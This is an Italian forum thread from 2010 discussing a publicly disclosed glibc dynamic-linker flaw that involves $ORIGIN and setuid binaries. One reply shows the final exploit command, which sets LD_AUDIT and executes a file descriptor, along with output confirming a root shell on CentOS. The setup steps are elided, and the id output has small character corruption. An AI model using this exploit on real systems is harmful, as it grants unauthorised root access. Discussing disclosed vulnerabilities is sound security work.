Precedente :: Successivo |
Autore |
Messaggio |
Guido Bolognesi [Zen] Ospite
|
Inviato: Mer 20 Ott 2010 08:36 Oggetto: Questa e` proprio bella |
|
|
Di due giorni fa, ma mi pare comunque interessante:
http://seclists.org/fulldisclosure/2010/Oct/257
The GNU C library dynamic linker expands $ORIGIN in setuid library search path
Provato su ubuntu con 2.7-10ubuntu6 e su una Debian con libc
2.7-18lenny4 e non va.
Su RH e Fedora mi dicono che funzioni, Tavis sostiene anche su CentOS.
have fun,
_________________
guido . zen@xxxxxx.xyz . skype://zenmobile |
|
Top |
|
|
Davide Brini Ospite
|
Inviato: Mer 20 Ott 2010 10:48 Oggetto: Questa e` proprio bella |
|
|
On Wednesday 20 Oct 2010 09:33:51 Guido Bolognesi [Zen] wrote:
Citazione: | Di due giorni fa, ma mi pare comunque interessante:
http://seclists.org/fulldisclosure/2010/Oct/257
The GNU C library dynamic linker expands $ORIGIN in setuid library search
path
Provato su ubuntu con 2.7-10ubuntu6 e su una Debian con libc
2.7-18lenny4 e non va.
Su RH e Fedora mi dicono che funzioni, Tavis sostiene anche su CentOS.
|
Questo e' su un CentOS aggiornato:
...
[foo@frobozz ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@frobozz ~]# whoami
root
[root@frobozz ~]# id
uid=0(root) gidP0(foo) groupsP0(foo) context=user_u:system_r:unconfined_t |
|
Top |
|
|
|
|
Non puoi inserire nuovi argomenti Non puoi rispondere a nessun argomento Non puoi modificare i tuoi messaggi Non puoi cancellare i tuoi messaggi Non puoi votare nei sondaggi
|
|